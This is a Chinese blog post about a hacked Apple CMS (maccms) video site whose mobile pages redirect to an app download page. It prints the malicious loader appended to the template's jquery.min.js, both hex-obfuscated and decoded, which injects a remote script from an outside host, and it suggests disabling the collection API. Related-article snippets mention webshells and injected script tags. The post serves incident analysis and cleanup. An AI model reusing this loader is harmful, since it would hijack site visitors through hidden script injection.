苹果cms最新漏洞被挂马跳转劫持及清除代码

最新推荐文章于 2024-08-04 22:21:07 发布
最新推荐文章于 2024-08-04 22:21:07 发布
阅读量6.4k 收藏 9
点赞数 1
文章标签: javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sexrenge/article/details/120092343
版权

网站被挂马跳转劫持跳转到H APP下载页。

被挂马的完整PC端正常无异常,移动页面js跳转,被增加了一个js跳转。

挂马图片

通过日志查看挂马过程

该漏洞是利用苹果CMS的API执行SHELL,

挂马文件在模板的jquery.min.js

;var head=document.getElementsByTagName(‘head’)[0];var script=document.createElement(‘script’);script[‘src’]=’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6d\x61\x63\x63\x6d\x73\x2e\x7a\x32\x33\x2e\x77\x65\x62\x2e\x63\x6f\x72\x65\x2e\x77\x69\x6e\x64\x6f\x77\x73\x2e\x6e\x65\x74\x2f\x37\x33\x32\x64\x2e\x6a\x73’;head.appendChild(script);
解密之后是

var head = document.getElementsByTagName(‘head’)[0];
var script = document.createElement(‘script’);
script[‘src’] = ‘https://maccms.z23.web.core.windows.net/732d.js’;
head.appendChild(script);
清除代码

关闭后台采集API功能。或自定义API接口名字,
欢迎关注我的网站http://sexrenge.com

sexrenge
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
苹果CMS播放页劫持跳转解决方案
winkexin的博客
06-14 766
苹果CMS播放页预加载页面被劫持,须在后台--系统设置--播放器参数设置下将预加载广告:缓冲广告:两项的内容全部删除,版本不同也相应寻找预加载和缓冲地址类似的选项删除即可。更改网站根目录/static/js/player.js下的文件,为如下内容对于v10版本用户。
苹果cms程序,播放页跳转的修补方法
小糯米的专栏
05-24 1万+
最近很多用MACCMS8.X或者是MACCMS10的苹果CMS站长发现自己的网站被跳转了,跳转到了一个读博的 经过研究发现,本身所有苹果cms的播放页里面的player.js都内嵌了苹果官方的加密链接,而最近苹果cms域名被别人了,每次播放页播放的时候,有一定概率会加载//union.maccms.com/html/top10.js中的广告代码。这就造成所有的苹果CMS的站点全部被黑. ...
常见的cms漏洞
最新发布
qq_68186313的博客
08-04 1382
2、点击【生成】--》【更新主页HTML】--》将主页位置修改为【.·/index.php】--》点击【生成静态】--》点击【更新主页】再次访问站点首页可发现变化。1、接着上一个环境使用,将带有后门的文件加入到主题中并将主题压缩为ZP文件点击【外观】-》【主题】--》【添加】--》【上传主题】--》【浏览】--》【现在安装】1、与WPCMS类似,直接修改模板拿WebShell..点击【模板】--》【默认模板管理】一》【index.htm】---》【修改】在文件修改中添加一句话代码如下。
苹果cms10的一次尝试发现了苹果cms10被极有可能是苹果cms作者故意的js漏洞或后门导致
jun2016425的博客
10-30 9415
最近闲无事想建个站来玩玩,但是又不想写于是乎就找了搜索了一下,苹果cms就出现在搜索引擎上面了,看来苹果cms的SEO做的还是不错的. 被表现: 播放视频时,有一定的概率会加载 http://union.maccms.com/html/top10.js 苹果cms后台某处或者采集的资源打印奇怪的字符比如 {if-A:printf(base64_decode("PHNjcmlwdCBzcmM9aHR0cHM6Ly9hZDIxMjMubHNqcG9ybi50b3AvdXBsb2FkL2FhYWEuan.
2020解决苹果CMS漏洞v8 v10最新版本
网站安全专家
01-04 4796
苹果CMS漏洞是越来越多了,国内很多电影网站都使用的是maccms V10 V8版本,就在2020年初该maccms漏洞爆发了,目前极少数的攻击者掌握了该EXP POC,受该BUG的影响,百分之80的电影站都被攻击了,很多电影站的站长找到我们SINE安全来解决网站被的问题,通过分析我们发现大部分客户网站在数据库中都被插入了代码,<script src=https://lefengtv...
location苹果_苹果cms播放跳转广告问题彻底解决方案
weixin_32601635的博客
12-23 2549
今天早上一觉起来,看到朋友留言,打开电影站后点播放就自动跳转广告,当时第一感觉,是采集站了,毕竟有过经历,然后各系列排查,竟然发现是苹果CMS系统,mlgb解决方法很简单,将下面这串代码,复制了然后替换掉系统原先的/static/js/player.js文件var killErrors=function(value){return true};window.onerror=nu...
苹果CMS漏洞
热门推荐
Grey的博客
07-11 1万+
1.环境搭建: 最新版本好像修复了这个漏洞 后来看大佬们分析是加了360safe、把他注释掉就可以复现了 审计过程:   首先在maccms8_mfb\inc\module\vod.php文件中的第93-98行的代码当$method=search成立的时候便回进入到be(“all”, “wd”)获取请求中wd参数的值,并使用chkSql($wd)方法对$wd进行安全处理。 ...
location苹果_最新苹果cms漏洞被频繁该如何解决
weixin_42627812的博客
12-12 385
2020年刚开始,苹果CMS被爆出数据库代码执行漏洞,大量的电影网站被,尤其电影的页面被篡改植入了恶意代码,数据库中的VOD表里的d_name被全部修改,导致网站打开后直接跳转到S站或者弹窗广告,目前该maccms漏洞受影响的苹果系统版本是V8,V10,很多客户网站被反复篡改,很无奈,通过朋友介绍找到我们寻求技术上支持,防止网站被。根据客户的反应,服务器采用的是linux centos系统...
苹果cms完美解决跳转广告问题
11-21
针对“苹果cms完美解决跳转广告问题”的主题,我们可以深入探讨苹果CMS如何处理和优化网站中的广告跳转,以提升用户体验。 一、苹果CMS概述 苹果CMS是一款基于PHP语言开发的开源CMS,适用于构建视频、文章等类型...
苹果CMS V10模板.rar_-baijiahao_palaceydm_苹果CMS10模板_苹果V10_苹果cms最新
07-15
苹果CMS是一款广泛应用于建站的开源内容管理系统,尤其在视频网站搭建方面表现出色。V10是其最新的版本,提供了一系列优化和改进,以提升用户体验和管理效率。在这个"苹果CMS V10模板.rar"压缩包中,包含了适用于...
苹果cms在线采集70多个接口.zip_苹果CMS多线路_苹果cms QQjs_苹果cms sitemap_苹果cms采集_苹
09-15
苹果CMS是一款广泛应用于建站的开源内容管理系统,尤其在视频网站搭建方面表现出色。这个压缩包文件"苹果cms在线采集70多个接口.zip"显然包含了与苹果CMS相关的接口资源,这些接口可能用于从不同源自动抓取和更新...
2023最新苹果CMS海螺模版V20修复版,另附广告代码
08-22
上传到苹果cms v10 根目录解压,网站后台切换模板, 网站模板和手机模板都是【conch】模板目录【moban】,清 理缓存。 注意微信观看功能要在conch/js/jquery.stem.js 这个文件夹修 改相应的内容 第301行 幻灯片推荐9...
苹果cms处理办法整理总结
苹果cms10好看的模板
12-21 2685
如果网站被了,应该怎么办呢?又怕后门清理不干净导致再次被。 下边给出一个简单的处理流程,适用于不懂找后门的小白们。 后门文件和数据库一定要清理干净。否则还会被查不出原因,以下是简单的办法。 比如旧网站域名是:mytheme.cn 1,再同一个服务器新建一个网站,绑定临时域名比如:a.mytheme.cn 2,从旧网站里备份出来模板目录template/xxxx/ ,upload/vo...
苹果MAC-CMS漏洞复现(SQL注入+命令执行漏洞写shell)
信安小菜鸡的博客
05-19 3752
前台修改密码处存在sql注入漏洞 注册账户登录后发送POST 查看数据库 查看用户 不过后续操作一直被拦截,暂未找到过滤方法 命令执行漏洞 直接获取php info信息 写shell 弱口令 admin/admin/123456 ...
漏洞复现】maccms苹果cms 命令执行漏洞
失心少年
11-16 2102
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。“苹果CMS” 似乎是指 “Maccms”,这是一款开源的内容管理系统,主要用于搭建视频网站。Maccms 提供了一套完整的解决方案,包括用户管理、视频上传、分类管理、数据统计等功能,使用户能够方便地创建和管理自己的视频网站。
苹果maccms网站漏洞进行修复解决方法教程
weixin_46020146的博客
09-05 296
苹果maccms网站漏洞进行修复解决方法教程
爆料:由于苹果CMS原官方.com域名被盗,能会被黑客利用
FlexUI的博客
06-25 772
由于CMS原官方域名被盗,可能会被黑客利用。 请尽快更新到V10版本2021.1000.1081 ; v8版本2021.1041 这是苹果cms作者在TG群发布的一掉公告, 据苹果cms开发者描述,2021年06月25日14时 在59互联,代理的新网注册的maccms.com域名在没有收到任何短信或邮件通知的情况悄无声息的被转到国外去了。 这意味所有使用苹果cms建站的网站将面临黑客入侵的风险,受影响非常大。作者在各大建站群发布了消息,与其同时另一路人也在发布消息,说片苹果cms官方GitH.
苹果maccms最新漏洞补丁 防止数据库被反复
网站安全资讯
01-02 541
【推荐】2019 Java 开发者跳槽指南.pdf(吐血整理) >>> ...
Maccms8.x 命令执行漏洞分析
fly小灰灰的专栏
07-30 7123
1. 漏洞描述 漏洞简述: Maccms搜索页面搜索输入参数过滤不严谨导致前台命令执行可getshell 影响版本: Maccms8.x 2. 漏洞简介  魅魔电影程序(Maccms PHP)是一套采用PHP/MySQL数据库运行的全新且完善的强大视频电影系统。完美支持众多视频网站和高清播放器(youku,tudou,qvod,gvod等),完全免费开源。  该漏洞主要的产生原因是CMS搜索页面搜索
苹果CMS安装与配置详解:环境检查与高级设置
本篇文章详细介绍了苹果CMS的安装及配置过程,主要针对的是苹果CMS v10版本,因为官方说明在PHP7.0之后always_populate_raw_post_data扩展默认启用,但在低版本中可能需要手动配置。以下步骤是文章的核心内容: 1. ...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

sexrenge

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值